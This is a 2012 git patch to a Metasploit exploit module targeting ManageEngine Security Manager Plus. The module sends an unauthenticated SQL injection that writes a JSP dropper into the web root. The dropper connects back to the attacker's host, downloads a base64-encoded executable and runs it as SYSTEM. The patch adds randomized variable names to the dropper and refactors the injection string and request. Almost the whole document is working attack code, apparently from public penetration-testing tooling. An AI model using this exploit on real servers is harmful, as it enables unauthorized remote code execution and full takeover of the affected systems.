From 669d22c917926e0a7576ea5c11f069cbdb028979 Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Tue, 23 Oct 2012 02:05:08 -0500
Subject: [PATCH] Final improvements

---
 .../windows/http/manage_engine_sqli.rb        | 95 +++++++++++--------
 1 file changed, 58 insertions(+), 37 deletions(-)

diff --git a/modules/exploits/windows/http/manage_engine_sqli.rb b/modules/exploits/windows/http/manage_engine_sqli.rb
index 064c335731..7d22cb3ab0 100644
--- a/modules/exploits/windows/http/manage_engine_sqli.rb
+++ b/modules/exploits/windows/http/manage_engine_sqli.rb
@@ -21,21 +21,23 @@ class Metasploit3 < Msf::Exploit::Remote
 					This module exploits a SQL injection found in ManageEngine Security Manager Plus
 				advanced search page.  It will send a malicious SQL query to create a JSP file
 				under the web root directory, and then let it download and execute our malicious
-				executable under the context of SYSTEM. No authentication is necessary to exploit this.
+				executable under the context of SYSTEM.  Authentication is not required in order
+				to exploit this vulnerability.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'xistence' # Discovery & Metasploit module
+					'xistence <xistence[at]0x90.nl>',  # Discovery & Metasploit module
+					'sinn3r'  # Improved Metasploit module
 				],
 			'References'     =>
 				[
-					['EDB','22094']
+					['EDB','22094'],
+					['BID', '56138']
 				],
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					# Win XP / 2003 / Vista / Win 7 / etc
 					['Windows Universal', {}]
 				],
 			'Privileged'     => false,
@@ -53,12 +55,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	# A very gentle check to see if Security Manager Plus exists or not
 	#
 	def check
-		res = send_request_raw({
-			'method' => 'GET',
-			'uri'	 => '/SecurityManager.cc'
-		})
+		res = send_request_raw({'uri' => '/SecurityManager.cc'})
 
-		if res and res.body =~ /\<title\>Security Manager Plus\<\/title\>/
+		if res and res.body =~ /\<title\>SecurityManager Plus\<\/title\>/
 			return Exploit::CheckCode::Detected
 		else
 			return Exploit::CheckCode::Safe
@@ -72,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	#
 	def on_new_session(cli)
 		if cli.type != 'meterpreter'
-			print_error("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}")
+			print_warning("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}")
 			return
 		end
 
@@ -105,33 +104,43 @@ class Metasploit3 < Msf::Exploit::Remote
 		my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
 		my_port = datastore['SRVPORT']
 
+		var_buf       = Rex::Text.rand_text_alpha(rand(8) + 3)
+		var_shellcode = Rex::Text.rand_text_alpha(rand(8) + 3)
+		var_outstream = Rex::Text.rand_text_alpha(rand(8) + 3)
+		var_socket    = Rex::Text.rand_text_alpha(rand(8) + 3)
+		var_bufreader = Rex::Text.rand_text_alpha(rand(8) + 3)
+		var_decoder   = Rex::Text.rand_text_alpha(rand(8) + 3)
+		var_temp      = Rex::Text.rand_text_alpha(rand(8) + 3)
+		var_path      = Rex::Text.rand_text_alpha(rand(8) + 3)
+		var_proc      = Rex::Text.rand_text_alpha(rand(8) + 3)
+
 		jsp = %Q|
 		<%@page import="java.io.*"%>
 		<%@page import="java.net.*"%>
 		<%@page import="sun.misc.BASE64Decoder"%>
 
 		<%
-		StringBuffer buf = new StringBuffer();
-		byte[] shellcode = null;
-		BufferedOutputStream outstream = null;
+		StringBuffer #{var_buf} = new StringBuffer();
+		byte[] #{var_shellcode} = null;
+		BufferedOutputStream #{var_outstream} = null;
 		try {
-			Socket s = new Socket("#{my_host}", #{my_port});
-			BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream()));
-			while (buf.length() < #{@native_payload.length}) {
-				buf.append( (char) r.read());
+			Socket #{var_socket} = new Socket("#{my_host}", #{my_port});
+			BufferedReader #{var_bufreader} = new BufferedReader(new InputStreamReader(#{var_socket}.getInputStream()));
+			while (#{var_buf}.length() < #{@native_payload.length}) {
+				#{var_buf}.append( (char) #{var_bufreader}.read());
 			}
 
-			BASE64Decoder decoder = new BASE64Decoder();
-			shellcode = decoder.decodeBuffer(buf.toString());
+			BASE64Decoder #{var_decoder} = new BASE64Decoder();
+			#{var_shellcode} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
 
-			File temp = File.createTempFile("#{@native_payload_name}", ".exe");
-			String path = temp.getAbsolutePath();
+			File #{var_temp} = File.createTempFile("#{@native_payload_name}", ".exe");
+			String #{var_path} = #{var_temp}.getAbsolutePath();
 
-			outstream = new BufferedOutputStream(new FileOutputStream(path));
-			outstream.write(shellcode);
-			outstream.close();
+			#{var_outstream} = new BufferedOutputStream(new FileOutputStream(#{var_path}));
+			#{var_outstream}.write(#{var_shellcode});
+			#{var_outstream}.close();
 
-			Process p = Runtime.getRuntime().exec(path);
+			Process #{var_proc} = Runtime.getRuntime().exec(#{var_path});
 		} catch (Exception e) {}
 		%>
 		|
@@ -151,36 +160,48 @@ class Metasploit3 < Msf::Exploit::Remote
 		select(nil, nil, nil, 1)
 
 		# Inject our JSP payload
-		print_status("#{rhost}:#{rport} - Sending JSP payload")
-		pass    = rand_text_alpha(rand(10)+5)
 		hex_jsp = generate_jsp_payload
 
-		cookie = 'STATE_COOKIE=%26SecurityManager%2FID%2F174%2FHomePageSubDAC_LIST%2F223%2FSecurityManager_CONTENTAREA_LIST%2F226%2FMainDAC_LIST%2F166%26MainTabs%2FID%2F167%2F_PV%2F174%2FselectedView%2FHome%26Home%2FID%2F166%2FPDCA%2FMainDAC%2F_PV%2F174%26HomePageSub%2FID%2F226%2FPDCA%2FSecurityManager_CONTENTAREA%2F_PV%2F166%26HomePageSubTab%2FID%2F225%2F_PV%2F226%2FselectedView%2FHomePageSecurity%26HomePageSecurity%2FID%2F223%2FPDCA%2FHomePageSubDAC%2F_PV%2F226%26_REQS%2F_RVID%2FSecurityManager%2F_TIME%2F31337; 2RequestsshowThreadedReq=showThreadedReqshow; 2RequestshideThreadedReq=hideThreadedReqhide;'
+		cookie  = 'STATE_COOKIE=&'
+		cookie << 'SecurityManager/ID/174/HomePageSubDAC_LIST/223/SecurityManager_CONTENTAREA_LIST/226/MainDAC_LIST/166&'
+		cookie << 'MainTabs/ID/167/_PV/174/selectedView/Home&'
+		cookie << 'Home/ID/166/PDCA/MainDAC/_PV/174&'
+		cookie << 'HomePageSub/ID/226/PDCA/SecurityManager_CONTENTAREA/_PV/166&'
+		cookie << 'HomePageSubTab/ID/225/_PV/226/selectedView/HomePageSecurity&'
+		cookie << 'HomePageSecurity/ID/223/PDCA/HomePageSubDAC/_PV/226&'
+		cookie << '_REQS/_RVID/SecurityManager/_TIME/31337; '
+		cookie << '2RequestsshowThreadedReq=showThreadedReqshow; '
+		cookie << '2RequestshideThreadedReq=hideThreadedReqhide;'
 
+		rnd_num = Rex::Text.rand_text_numeric(1)
+		sqli  = "#{rnd_num})) union select 0x#{hex_jsp},"
+		sqli << (2..28).map {|e| e} * ","
+		sqli << " into outfile #{@outpath} FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"
+
+		state_id = Rex::Text.rand_text_numeric(5)
+		print_status("#{rhost}:#{rport} - Sending JSP payload")
 		res = send_request_cgi({
 			'method'    => 'POST',
-			'uri'       => '/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP',
+			'uri'       => "/STATE_ID/#{state_id}/jsp/xmlhttp/persistence.jsp",
 			'headers'   => {
 				'Cookie' => cookie,
 				'Accept-Encoding' => 'identity'
 			},
+			'vars_get'  => {
+				'reqType'    =>'AdvanceSearch',
+				'SUBREQUEST' =>'XMLHTTP'
+			},
 			'vars_post' => {
 				'ANDOR'       => 'and',
 				'condition_1' => 'OpenPorts@PORT',
 				'operator_1'  => 'IN',
-				'value_1'     => "1)) union select 0x#{hex_jsp},2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29 into outfile #{@outpath} FROM mysql.user WHERE 1=((1",
+				'value_1'     => sqli,
 				'COUNT'       => '1'
 			}
 		})
 
 		print_status("#{rhost}:#{rport} - Sending /#{@jsp_name + '.jsp'}")
-		res = send_request_raw({
-			'method'  => 'GET',
-			'uri'     => "/#{@jsp_name + '.jsp'}",
-			'headers' => {
-				'Cookie' => 'pwnage'
-			}
-		})
+		send_request_raw({'uri' => "/#{@jsp_name + '.jsp'}"})
 
 		handler
 	end